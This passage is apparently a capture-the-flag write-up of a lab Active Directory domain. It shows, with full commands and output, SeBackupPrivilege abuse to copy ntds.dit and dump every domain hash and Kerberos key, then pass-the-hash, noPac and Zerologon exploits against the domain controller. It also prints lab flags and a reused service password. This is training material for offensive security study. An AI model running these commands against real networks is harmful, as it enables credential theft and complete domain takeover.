593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

Checking in bloodhound which users belong to the Remote Management Users group, we only find backup-svc in it

Since it has that privilege and we have its password, with evil-winrm we can connect and get a powershell on the DC as backup-svc

❯ evil-winrm -i 172.16.249.200 -u backup-svc -p #S3rvice#@cc  
PS C:\Users\backup-svc\Documents> whoami
htb\backup-svc
PS C:\Users\backup-svc\Documents> type ..\Desktop\flag.txt
XEN{y_5h4r3d_p@55w0Rd5?}
PS C:\Users\backup-svc\Documents>


Owned

XEN{d3r1v471v3_d0m41n_4dm1n}


Among the groups backup-svc belongs to in bloodhound we can see Remote Desktop Users, which also lets us connect over RDP

Using xfreerdp and the credentials we have, we connect

❯ xfreerdp /u:backup-svc /p:#S3rvice#@cc /v:172.16.249.200 /cert:ignore  

Among the privileges the user backup-svc holds, one stands out: SeBackupPrivilege, which allows creating backups of the disk

PS C:\Users\backup-svc\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======  
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

PS C:\Users\backup-svc\Documents>

Using diskshadow from the RDP session we can create a shadow copy of the whole C: volume with the alias xyz, which we then expose as drive X:

PS C:\Users\backup-svc> diskshadow
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC,  4/25/2023 5:40:20 PM

DISKSHADOW> set context persistent nowriters

DISKSHADOW> add volume C: alias xyz

DISKSHADOW> set metadata C:\ProgramData\xyz.cab

DISKSHADOW> create
Alias xyz for shadow ID {99d84211-b50c-47f6-951b-d0f728bd0b1e} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {f443e047-dbf4-4de0-867f-1156f9ae0a49} set as environment variable.  

Querying all shadow copies with the shadow copy set ID {f443e047-dbf4-4de0-867f-1156f9ae0a49}

        * Shadow copy ID = {99d84211-b50c-47f6-951b-d0f728bd0b1e}               %xyz%
                - Shadow copy set: {f443e047-dbf4-4de0-867f-1156f9ae0a49}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{78d1dcbd-51bd-4ccf-907c-aa32152ad3f2}\ [C:\]
                - Creation time: 4/25/2023 5:41:05 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
                - Originating machine: DC.htb.local
                - Service machine: DC.htb.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1

DISKSHADOW> expose %xyz% X:
-> %xyz% = {99d84211-b50c-47f6-951b-d0f728bd0b1e}
The shadow copy was successfully exposed as X:\.

DISKSHADOW>

With the upload function built into evil-winrm we can upload a couple of dlls that help exploit this privilege, and then import them as modules

PS C:\ProgramData> upload SeBackupPrivilegeCmdLets.dll

Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\Users\backup-svc\Documents\SeBackupPrivilegeCmdLets.dll  

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

PS C:\ProgramData> upload SeBackupPrivilegeUtils.dll

Info: Uploading SeBackupPrivilegeUtils.dll to C:\Users\backup-svc\Documents\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

PS C:\ProgramData> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\ProgramData> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\ProgramData>

Now, reading from the shadow copy through drive X:, we copy ntds.dit, which contains the hashes of every domain user, together with the SYSTEM hive

PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\NTDS\ntds.dit ntds.dit
PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\System32\Config\SYSTEM SYSTEM  

We can connect with impacket's smbclient using the C$ share, enter the ProgramData folder where our files are, and download them with get

❯ impacket-smbclient htb.local/backup-svc:#S3rvice#@cc@172.16.249.200  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# cd ProgramData
# get ntds.dit
# get SYSTEM
#

Now locally, with impacket's secretsdump, we pass it the SYSTEM hive and the ntds.dit we downloaded and dump all the domain hashes

❯ impacket-secretsdump LOCAL -system SYSTEM -ntds ntds.dit
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x6e398137ec7f2e204671dad7c778509f
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 4a62a0ac1475b54add921ac8c1b72e31
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:5e507509602e1b651759527b87b6c347:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3791ca8d70c9e1d2d2c7c5b5c7c253e8:::
CITRIX$:1103:aad3b435b51404eeaad3b435b51404ee:fd981d0c915932bb3ddf38b415c49121:::
htb.local\alarsson:1104:aad3b435b51404eeaad3b435b51404ee:92a44f1aa6259c55f9f514fabae5cc3f:::
htb.local\jmendes:1106:aad3b435b51404eeaad3b435b51404ee:10d0c05f7d958955f0eaf1479b5124a0:::
htb.local\pmorgan:1107:aad3b435b51404eeaad3b435b51404ee:8618ba932416a7404a854b250bf28577:::
htb.local\awardel:1108:aad3b435b51404eeaad3b435b51404ee:270e4d446437f4383b092b42a9f88f0a:::
VDESKTOP3$:1109:aad3b435b51404eeaad3b435b51404ee:e582f9b9d77dae6357bb574620b721ce:::
VDESKTOP2$:1110:aad3b435b51404eeaad3b435b51404ee:f583f9b5fc860b9ae21e482caaad0553:::
VDESKTOP1$:1111:aad3b435b51404eeaad3b435b51404ee:f96d793a4b9d2b8517123ad8d1e26b03:::
htb.local\xenserver-svc:1112:aad3b435b51404eeaad3b435b51404ee:ffc86906b87839a80c9a5df66fd39452:::
htb.local\print-svc:1113:aad3b435b51404eeaad3b435b51404ee:ffc86906b87839a80c9a5df66fd39452:::
htb.local\mssql-svc:1115:aad3b435b51404eeaad3b435b51404ee:ffc86906b87839a80c9a5df66fd39452:::
htb.local\mturner:1117:aad3b435b51404eeaad3b435b51404ee:330e8573172989af7b756c4b831d7788:::
htb.local\app-svc:1118:aad3b435b51404eeaad3b435b51404ee:feabcb5e62391216ff8ba2bbf487298b:::
htb.local\rprakash:1119:aad3b435b51404eeaad3b435b51404ee:64b49f377000aa5e512625de928e6a05:::
LAPTOP1$:1120:aad3b435b51404eeaad3b435b51404ee:fafcb53e7c9e126632dee80a69a6bc40:::
LAPTOP2$:1121:aad3b435b51404eeaad3b435b51404ee:a898f3e4f7766d961f1c93d96e52821e:::
LAPTOP3$:1122:aad3b435b51404eeaad3b435b51404ee:ff9313db8ceebfb0e37be27dcbda8011:::
LAPTOP5$:1123:aad3b435b51404eeaad3b435b51404ee:bb0e3fae33f0f5fa0149e0eca3ea8802:::
LAPTOP6$:1124:aad3b435b51404eeaad3b435b51404ee:fb6667b6521fcb2e3c8ab72688e560d1:::
htb.local\urquarti:1125:aad3b435b51404eeaad3b435b51404ee:182bc93cf09b8c0f5061facd4976f664:::
htb.local\rdrew:1137:aad3b435b51404eeaad3b435b51404ee:22cb6094730daf99418dc0373ed0a46e:::
htb.local\fboucher:1138:aad3b435b51404eeaad3b435b51404ee:7f2dca6c6f0865f8955e720063a98f4c:::
htb.local\cmeller:1139:aad3b435b51404eeaad3b435b51404ee:be5d31e3ee91641b2f4d5ad7da384c4b:::
htb.local\anagy:1140:aad3b435b51404eeaad3b435b51404ee:b53e1fc07b17a1dd5637db069ce81f67:::
WK01$:1142:aad3b435b51404eeaad3b435b51404ee:e7ef2a5d6ae326424d8f4b936fe8a129:::
WK02$:1143:aad3b435b51404eeaad3b435b51404ee:e55fbb54432c61dea5f21874a342583d:::
WK03$:1144:aad3b435b51404eeaad3b435b51404ee:acbf68032188283bfdaadea761b9a700:::
WK04$:1145:aad3b435b51404eeaad3b435b51404ee:ecbbb4c9d9b1817aaaa47f3bebcec950:::
WK05$:1146:aad3b435b51404eeaad3b435b51404ee:1b4e60ea2d87ec132336aa0cb06cb58c:::
WK06$:1147:aad3b435b51404eeaad3b435b51404ee:2c17c9ff7dd85996f1078a12eb469f4a:::
WK07$:1149:aad3b435b51404eeaad3b435b51404ee:cc2413c14387878386b6a9d62f75f72e:::
WK09$:1150:aad3b435b51404eeaad3b435b51404ee:1e0a5fed55e52312227b5769013fa7e9:::
htb.local\backup-svc:1151:aad3b435b51404eeaad3b435b51404ee:ffc86906b87839a80c9a5df66fd39452:::
htb.local\test-svc:1152:aad3b435b51404eeaad3b435b51404ee:4e36a1854ae7cc3681b6168fe5906e45:::
htb.local\netscaler-svc:1602:aad3b435b51404eeaad3b435b51404ee:ffc86906b87839a80c9a5df66fd39452:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:eeae682fea0120839f5cf840279b650a223418a334861b32001dbaab7060b0cb
Administrator:aes128-cts-hmac-sha1-96:4e77eb212c9c89234d061171eb981b92
Administrator:des-cbc-md5:2ac7b38ff1a48f67
DC$:aes256-cts-hmac-sha1-96:61d67418b4a65e6b6161b86fcd1abfe55b0e4f2f5d8efb339816b67825082e9f
DC$:aes128-cts-hmac-sha1-96:38a2a2858c324ab9993eedf9b9bed4f3
DC$:des-cbc-md5:ad6452c4072c57d9
krbtgt:aes256-cts-hmac-sha1-96:a67001bfb6c76224f2156450518191893c84d3cb6cee2956ef2659635a692458
krbtgt:aes128-cts-hmac-sha1-96:2f187b734a44d3344028d9c50de6d45c
krbtgt:des-cbc-md5:7675192346f80864
CITRIX$:aes256-cts-hmac-sha1-96:72eb6b137275e892b09fc74714ea068512a7c8b2adc2e24f260e8e76783e29c7
CITRIX$:aes128-cts-hmac-sha1-96:7c96d2b6f85994f52f9b14e18bf73618
CITRIX$:des-cbc-md5:3468c72cb58f547a
htb.local\alarsson:aes256-cts-hmac-sha1-96:2e7be1f105bcd413783a682a27ec6e3424c1a93a507b831a4b75e1efca570e78
htb.local\alarsson:aes128-cts-hmac-sha1-96:53db5c1a232a02eb7ceeb620650d730c
htb.local\alarsson:des-cbc-md5:e068792fe58c37ea
htb.local\jmendes:aes256-cts-hmac-sha1-96:d91d10c9f00b17f3e3d29dee98af067c19884da47ec34b8f33750a74ca0410ee
htb.local\jmendes:aes128-cts-hmac-sha1-96:ad976084f2d76cc6527b623a42f878ef
htb.local\jmendes:des-cbc-md5:2638f87697cde61f
htb.local\pmorgan:aes256-cts-hmac-sha1-96:fafd1c2483f05d20ea355448192719b6aca35fec1ef975b5a5c624de43c01ba3
htb.local\pmorgan:aes128-cts-hmac-sha1-96:90e2852e2c2357dcb43735a46a01e9f3
htb.local\pmorgan:des-cbc-md5:5773647cfbece580
htb.local\awardel:aes256-cts-hmac-sha1-96:f4135a5898349631bbf9976776615c5b2369ae0d00c7f91af6348a202a93666f
htb.local\awardel:aes128-cts-hmac-sha1-96:2d619944af0976beaf6f9b3c529665e6
htb.local\awardel:des-cbc-md5:3d9852e5e5fe08d9
VDESKTOP3$:aes256-cts-hmac-sha1-96:0dfdb6fb02b612d20e71f7c352eb918c7cc12679fa71d33ece0d4bff1602c452
VDESKTOP3$:aes128-cts-hmac-sha1-96:775c3974a30607b87ee1485bb849d1f8
VDESKTOP3$:des-cbc-md5:3de3b9c40da7cbc4
VDESKTOP2$:aes256-cts-hmac-sha1-96:67f8834883f679e28326b9c416ee0772a976cbc89fa904df407441fd763e623e
VDESKTOP2$:aes128-cts-hmac-sha1-96:baddab259a607c381adf118bf9bedf8b
VDESKTOP2$:des-cbc-md5:d32aa48326d585f8
VDESKTOP1$:aes256-cts-hmac-sha1-96:c0b601d91c47b8561cd3b8a41602b2dab6156d21135f52d92685fd4b71137794
VDESKTOP1$:aes128-cts-hmac-sha1-96:f1876be811720aec380948053a2bfa9e
VDESKTOP1$:des-cbc-md5:ec15c8269798e076
htb.local\xenserver-svc:aes256-cts-hmac-sha1-96:e93ba34ca8302dcfd988471ca49705c19078297ba4b2a554e6ef2f56bd2606d0
htb.local\xenserver-svc:aes128-cts-hmac-sha1-96:17af7b322987bb99a9961620a7ea54c5
htb.local\xenserver-svc:des-cbc-md5:5eb9a8fb91c75d57
htb.local\print-svc:aes256-cts-hmac-sha1-96:8e1a24efa266b33c1e5cfd5de1c678b29d0ef2d24f22eec48fe180f869d7dd2c
htb.local\print-svc:aes128-cts-hmac-sha1-96:7761dc9a8c9d579233bf0f9e4fa9a76e
htb.local\print-svc:des-cbc-md5:5dec430437e68a52
htb.local\mssql-svc:aes256-cts-hmac-sha1-96:7c9cbd4961788963c434e2d68e5d10eeb0b31432d54c5f97c67a3aec5841334d
htb.local\mssql-svc:aes128-cts-hmac-sha1-96:7bbe39d16a768bcb90a2845388654fab
htb.local\mssql-svc:des-cbc-md5:a2899257cbc86e3b
htb.local\mturner:aes256-cts-hmac-sha1-96:3fd0741a675313dcccbc9d15326aca33157da79adbf29b983e0b99cda27be9d2
htb.local\mturner:aes128-cts-hmac-sha1-96:6364145fad3f59dc79992a0abdea551c
htb.local\mturner:des-cbc-md5:3415c8b9fdad377a
htb.local\app-svc:aes256-cts-hmac-sha1-96:b4ac26617c753a88429e9ab336426ef3ef0d4d4915f45db0b80e62bfcc8fc2a5
htb.local\app-svc:aes128-cts-hmac-sha1-96:9f2601ed8d2a622b363937fd605e7e75
htb.local\app-svc:des-cbc-md5:a2b6dce3cd02ab34
htb.local\rprakash:aes256-cts-hmac-sha1-96:a44f3db333a59f90b6ade01b6f7d22a5da2059315b119f05bc755053c132967f
htb.local\rprakash:aes128-cts-hmac-sha1-96:e36ddd0004eca6a394e1a790c5389148
htb.local\rprakash:des-cbc-md5:f7da54b940981a97
LAPTOP1$:aes256-cts-hmac-sha1-96:41fca391ab1ca4c39b98342da3ee718e9e53795f65d254cb28ff3e12a6b56c24
LAPTOP1$:aes128-cts-hmac-sha1-96:bb3c3e49cc4bb7de0284a5fbebf3dd79
LAPTOP1$:des-cbc-md5:23f4912fdfe9c7cb
LAPTOP2$:aes256-cts-hmac-sha1-96:f06bf5b3959cfc0bedb1f7f52c9d89d2ff419bb264e4f50135bf2513a20ce019
LAPTOP2$:aes128-cts-hmac-sha1-96:fe47a3b3c1b7c5d2063855aa34cb9edf
LAPTOP2$:des-cbc-md5:df4c769e0e5b76da
LAPTOP3$:aes256-cts-hmac-sha1-96:26d72e03fa8f066546b1a9ed81da1e531554574d7e792066293c28b10dc07ff5
LAPTOP3$:aes128-cts-hmac-sha1-96:ef548fd68edc04c648fc028d14fef6ae
LAPTOP3$:des-cbc-md5:adf73151a2dfaba8
LAPTOP5$:aes256-cts-hmac-sha1-96:3aea19a0f81ee5953aed4f9f120b62631d98cfa5fd79fd72feee31c4b7d9e683
LAPTOP5$:aes128-cts-hmac-sha1-96:07947532a1ba3d85ae9a0af0ead03df5
LAPTOP5$:des-cbc-md5:a14683bfec10041c
LAPTOP6$:aes256-cts-hmac-sha1-96:08ff2ca4a5b08b38cda01283e30ac6c5060b7df1b1a31704ce999e1e6f82e826
LAPTOP6$:aes128-cts-hmac-sha1-96:1c3c09621a71454d68628ea8ad7f3efb
LAPTOP6$:des-cbc-md5:daae0794ae9b4c45
htb.local\urquarti:aes256-cts-hmac-sha1-96:8b16b04964ee76e1dd552aec8ae9d0a5814f5540cfc1633e82d94a83ac0b44bf
htb.local\urquarti:aes128-cts-hmac-sha1-96:95020927b31af43490b318a71c7c6d30
htb.local\urquarti:des-cbc-md5:73513b1c7a254ab6
htb.local\rdrew:aes256-cts-hmac-sha1-96:9b5a0c3331c19aa3f2105a8ac580c8517420ec1eb0dbc9f628fa75a90c430c9b
htb.local\rdrew:aes128-cts-hmac-sha1-96:2cb7d0a1c8e47e57622b2c4cef38f653
htb.local\rdrew:des-cbc-md5:7fbca7bafd52ece9
htb.local\fboucher:aes256-cts-hmac-sha1-96:cf0901292925026c6016e2a4cce50754dead6aeb5c0810be574b340a240c037b
htb.local\fboucher:aes128-cts-hmac-sha1-96:5a9f7dcf35f69a2910af82d275950f64
htb.local\fboucher:des-cbc-md5:2067374fefc1d56e
htb.local\cmeller:aes256-cts-hmac-sha1-96:87a86ed952630e3bac9b8af26d5e6f0c1d600f80b8de68f447c03f12f0089b83
htb.local\cmeller:aes128-cts-hmac-sha1-96:0d5f1803002032e36b232454de023d25
htb.local\cmeller:des-cbc-md5:cea14a45751fb3cb
htb.local\anagy:aes256-cts-hmac-sha1-96:7db3d41cfd047cae47e535bb9dd081803fbd9d506ed4fccf61ee68942953785f
htb.local\anagy:aes128-cts-hmac-sha1-96:ef235f741cb6e0aaf96233ff44e36b9b
htb.local\anagy:des-cbc-md5:6de0203d1a4cea02
WK01$:aes256-cts-hmac-sha1-96:b15ed9285ad9eb4f657e6c53d9208c1f93eacf7a7ffe60ed1d66900c69932a14
WK01$:aes128-cts-hmac-sha1-96:92eadcddca5722eb4852c3c7695bd675
WK01$:des-cbc-md5:45012970c2fd978c
WK02$:aes256-cts-hmac-sha1-96:b360f46dc8c76522508e4ce7c057f5c54ff97633855260f007a394e10d1d6fe9
WK02$:aes128-cts-hmac-sha1-96:c616f6b97592811ffd188981e47013a8
WK02$:des-cbc-md5:fbf45d5407700438
WK03$:aes256-cts-hmac-sha1-96:d687ad11c23ee33f915f02d187c102a64a9f965353dce728af483af32d373253
WK03$:aes128-cts-hmac-sha1-96:99ffe501a1b9315de908581a479a1905
WK03$:des-cbc-md5:f74f8564641cc2d9
WK04$:aes256-cts-hmac-sha1-96:4ecc004e82e349c692f30cb28cd69336f1eb07440ea74ea1b53fcc97d2afda79
WK04$:aes128-cts-hmac-sha1-96:e265b80c714ac59416acc4665a0c3191
WK04$:des-cbc-md5:a801d36429f4b9da
WK05$:aes256-cts-hmac-sha1-96:8d76ad3a60a32ea9584c5fd045f64668c1387a251981d5457aeac93ba3920b14
WK05$:aes128-cts-hmac-sha1-96:3168586f11bac1f16633a2cdc755018b
WK05$:des-cbc-md5:6ea191fe7a85a8f4
WK06$:aes256-cts-hmac-sha1-96:f9d5d01712e4b873e2e7588f635f9373476b7eab58757b68137c9240697da1d4
WK06$:aes128-cts-hmac-sha1-96:cbe9710ee38dc52d4c3cf68fd7c44a4f
WK06$:des-cbc-md5:4c027f2516857380
WK07$:aes256-cts-hmac-sha1-96:4f1cd1f1db09450ea89443cd8d3fbc98232457d61cfe20baeba492d94dbca7d6
WK07$:aes128-cts-hmac-sha1-96:810e5b35c75166108798e3ba275f0493
WK07$:des-cbc-md5:d920d6349b10154f
WK09$:aes256-cts-hmac-sha1-96:752ad9fa558cbf45543f8a2d0ebf1e9525f612d06cf48e1698785903e9ae738f
WK09$:aes128-cts-hmac-sha1-96:f06109d04b2a64af591c2b5d172ff2ef
WK09$:des-cbc-md5:cdbc866e6b3ddc16
htb.local\backup-svc:aes256-cts-hmac-sha1-96:628a8f9db4eb152717dca67e8d3c996827f02c2fdbfe2d427d783c369c86f328
htb.local\backup-svc:aes128-cts-hmac-sha1-96:ccd79fe595de98935f2dc557bcd175fb
htb.local\backup-svc:des-cbc-md5:7c916bfebfaee308
htb.local\test-svc:aes256-cts-hmac-sha1-96:8bc92a6544e449c9051c5b4a5e0a8c11908927d8e6409f58067f91b22f69051b
htb.local\test-svc:aes128-cts-hmac-sha1-96:99e7edfc2feee188005c71bff7d65c16
htb.local\test-svc:des-cbc-md5:136b917097e69149
htb.local\netscaler-svc:aes256-cts-hmac-sha1-96:b81fce62fe63a6240ca8e4bb04d6700ca6c2d0a9a3e614db5811879291a04b99  
htb.local\netscaler-svc:aes128-cts-hmac-sha1-96:bdaaa24b4d91a8ce54eb9f62c60ec162
htb.local\netscaler-svc:des-cbc-md5:f18a4c4cd34a2a52
[*] Cleaning up...

With crackmapexec we check the Administrator hash across the domain; since it is valid we have compromised the DC and every machine joined to the domain

❯ crackmapexec smb 172.16.249.200-205 -u Administrator -H 822601ccd7155f47cd955b94af1558be 
SMB         172.16.249.201  445    CITRIX           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CITRIX) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         172.16.249.205  445    VDESKTOP3        [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:VDESKTOP3) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)
SMB         172.16.249.201  445    CITRIX           [+] htb.local\Administrator:822601ccd7155f47cd955b94af1558be (Pwn3d!)
SMB         172.16.249.205  445    VDESKTOP3        [+] htb.local\Administrator:822601ccd7155f47cd955b94af1558be (Pwn3d!)
SMB         172.16.249.200  445    DC               [+] htb.local\Administrator:822601ccd7155f47cd955b94af1558be (Pwn3d!)

We simply connect with evil-winrm to the DC as the user Administrator using pass-the-hash, get a shell, and finally read the flag

❯ evil-winrm -i 172.16.249.200 -u Administrator -H 822601ccd7155f47cd955b94af1558be  
PS C:\Users\Administrator\Documents> whoami
htb\administrator
PS C:\Users\Administrator\Documents> hostname
DC
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
XEN{d3r1v471v3_d0m41n_4dm1n}
PS C:\Users\Administrator\Documents>


Extra 1

CVE-2021-42278 / CVE-2021-42287 - DC Administrator


As an alternative we can use noPac; running it with the -shell parameter gives us a cmd as nt authority\system directly on the DC

❯ python3 noPac.py htb.local/pmorgan:Summer1Summer! -dc-ip 172.16.249.200 -use-ldap -shell

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dc.htb.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-SEPUBVA8LHE$"
[*] MachineAccount "WIN-SEPUBVA8LHE$" password = 0$)qspgbzEhK
[*] Successfully added machine account WIN-SEPUBVA8LHE$ with password 0$)qspgbzEhK.
[*] WIN-SEPUBVA8LHE$ object = CN=WIN-SEPUBVA8LHE,CN=Computers,DC=htb,DC=local
[*] WIN-SEPUBVA8LHE$ sAMAccountName == dc
[*] Saving a DC's ticket in dc.ccache
[*] Reseting the machine account to WIN-SEPUBVA8LHE$
[*] Restored WIN-SEPUBVA8LHE$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_dc.htb.local.ccache
[*] Attempting to del a computer with the name: WIN-SEPUBVA8LHE$
[-] Delete computer WIN-SEPUBVA8LHE$ Failed! Maybe the current user does not have permission.  
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
DC

C:\Windows\system32>


Extra 2

CVE-2020-1472 - DC Administrator


As another alternative we can run the zerologon exploit against the DC; the server is vulnerable and we manage to set the machine account password to an empty string

❯ python3 cve-2020-1472-exploit.py DC 172.16.249.200
Performing authentication attempts...
==========================================================================  
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Authenticating as the DC$ machine account with an empty password we can perform a DCSync and see the NT hash of the user Administrator

❯ crackmapexec smb 172.16.249.200 -u DC$ -p '' --ntds drsuapi --user Administrator
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         172.16.249.200  445    DC               [+] htb.local\DC$: 
SMB         172.16.249.200  445    DC               [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         172.16.249.200  445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         172.16.249.200  445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be:::

Finally we can simply connect with evil-winrm to the DC as the user Administrator using pass-the-hash and get a powershell

❯ evil-winrm -i 172.16.249.200 -u Administrator -H 822601ccd7155f47cd955b94af1558be  
PS C:\Users\Administrator\Documents> whoami
htb\administrator
PS C:\Users\Administrator\Documents> hostname
DC
PS C:\Users\Administrator\Documents>